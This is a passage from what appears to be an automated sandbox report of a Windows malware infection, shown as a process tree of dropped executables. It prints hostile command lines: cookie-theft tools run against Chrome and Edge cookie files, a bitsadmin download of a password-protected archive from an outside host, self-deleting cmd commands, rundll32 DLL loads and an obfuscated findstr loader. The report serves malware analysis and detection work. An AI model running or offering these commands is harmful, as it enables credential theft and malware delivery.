                                                                                                                    C:\Users\Public\run.exe
                                                                                                                    8⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4112
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                                                                      9⤵
                                                                                                                        PID:4312
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          10⤵
                                                                                                                            PID:5772
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                            10⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:4444
                                                                                                                  • C:\Users\Admin\Documents\ruYvS_IphFDo6YLSl2NhF_e4.exe
                                                                                                                    "C:\Users\Admin\Documents\ruYvS_IphFDo6YLSl2NhF_e4.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4332
                                                                                                                    • C:\Users\Admin\Documents\ruYvS_IphFDo6YLSl2NhF_e4.exe
                                                                                                                      "C:\Users\Admin\Documents\ruYvS_IphFDo6YLSl2NhF_e4.exe" -a
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4668
                                                                                                                  • C:\Users\Admin\Documents\mEARv22TJKwqSyIG6TuR0H40.exe
                                                                                                                    "C:\Users\Admin\Documents\mEARv22TJKwqSyIG6TuR0H40.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:4288
                                                                                                                  • C:\Users\Admin\Documents\rxp246X4Pqew1N0mUE_Qpgvc.exe
                                                                                                                    "C:\Users\Admin\Documents\rxp246X4Pqew1N0mUE_Qpgvc.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:4456
                                                                                                                    • C:\Users\Admin\Documents\rxp246X4Pqew1N0mUE_Qpgvc.exe
                                                                                                                      C:\Users\Admin\Documents\rxp246X4Pqew1N0mUE_Qpgvc.exe
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3488
                                                                                                                  • C:\Users\Admin\Documents\KJ0cGwYe7zrXK14u0XwK5alv.exe
                                                                                                                    "C:\Users\Admin\Documents\KJ0cGwYe7zrXK14u0XwK5alv.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:3504
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 656
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4092
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 672
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4992
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 676
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4516
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 632
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4464
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1128
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:1600
                                                                                                                  • C:\Users\Admin\Documents\ztb3_Wn1hUK61Qlj_znkimZh.exe
                                                                                                                    "C:\Users\Admin\Documents\ztb3_Wn1hUK61Qlj_znkimZh.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4644
                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Drops startup file
                                                                                                                      PID:4604
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6072
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5868
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5032
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5064
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5684
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4836
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6116
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5752
                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      PID:4328
                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3192
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                          PID:5452
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          8⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2128
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          8⤵
                                                                                                                            PID:512
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            8⤵
                                                                                                                              PID:1900
                                                                                                                        • C:\Users\Admin\Documents\EHSxz6QRVksIxQt0UYPLjr10.exe
                                                                                                                          "C:\Users\Admin\Documents\EHSxz6QRVksIxQt0UYPLjr10.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:3864
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im EHSxz6QRVksIxQt0UYPLjr10.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\EHSxz6QRVksIxQt0UYPLjr10.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            7⤵
                                                                                                                              PID:5292
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im EHSxz6QRVksIxQt0UYPLjr10.exe /f
                                                                                                                                8⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5644
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                8⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:5280
                                                                                                                          • C:\Users\Admin\Documents\BU_wHaQlqQjO8T6HeWaPbdXB.exe
                                                                                                                            "C:\Users\Admin\Documents\BU_wHaQlqQjO8T6HeWaPbdXB.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:816
                                                                                                                            • C:\Users\Admin\Documents\BU_wHaQlqQjO8T6HeWaPbdXB.exe
                                                                                                                              "C:\Users\Admin\Documents\BU_wHaQlqQjO8T6HeWaPbdXB.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:5896
                                                                                                                          • C:\Users\Admin\Documents\2vGlvYeU58aWo2_ajsNkcrFb.exe
                                                                                                                            "C:\Users\Admin\Documents\2vGlvYeU58aWo2_ajsNkcrFb.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:860
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2156
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1256
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              7⤵
                                                                                                                                PID:4164
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                7⤵
                                                                                                                                  PID:1584
                                                                                                                              • C:\Users\Admin\Documents\_O8Doww0xZc0p0AtY12w_AN3.exe
                                                                                                                                "C:\Users\Admin\Documents\_O8Doww0xZc0p0AtY12w_AN3.exe"
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                PID:2172
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                    PID:4112
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                    7⤵
                                                                                                                                      PID:5772
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                        PID:4076
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                        7⤵
                                                                                                                                          PID:5044
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                          7⤵
                                                                                                                                            PID:5316
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                            7⤵
                                                                                                                                              PID:4224
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                              7⤵
                                                                                                                                              • Checks for any installed AV software in registry
                                                                                                                                              PID:6056
                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                              "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                              7⤵
                                                                                                                                              • Download via BitsAdmin
                                                                                                                                              PID:5444
                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnLBevXQnRnohLuH -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                              7⤵
                                                                                                                                                PID:1112
                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfy5nofGbTcOx4Im -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                7⤵
                                                                                                                                                  PID:4868
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:3652
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5456
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5628
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:4516
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:64
                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IlDjZMyUhJn\IlDjZMyUhJn.dll" IlDjZMyUhJn
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5392
                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IlDjZMyUhJn\IlDjZMyUhJn.dll" IlDjZMyUhJn
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:6016
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:1072
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:4316
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:5452
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh84B.tmp\tempfile.ps1"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:4560
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:1164
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_6.exe
                                                                                                                                                                    sonia_6.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:3880
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:1412
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4296
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:4004
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:364
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2244
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:2124
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_4.exe
                                                                                                                                                                          sonia_4.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:2824
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:1188
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_1.exe
                                                                                                                                                                          sonia_1.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:2584
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_1.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_1.exe" -a
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:3856
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 532
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Program crash
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:3796
                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:1088
                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:4016
                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:3044
                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:2260
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:2784
                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                  PID:6108
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:6120
                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                  PID:2068
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DA7D.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DA7D.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  PID:4476
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DFCE.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DFCE.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4480
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E3F5.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E3F5.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1204
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E761.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E761.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5916
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\EB4A.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\EB4A.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5184
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F09B.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F09B.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5972
                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                            cmd /c start c.exe & start l.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5056
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c.exe
                                                                                                                                                                                c.exe
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5692
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5452
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:2828
                                                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                          findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:4468
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                            Puramente.exe.com m
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:908
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:5308
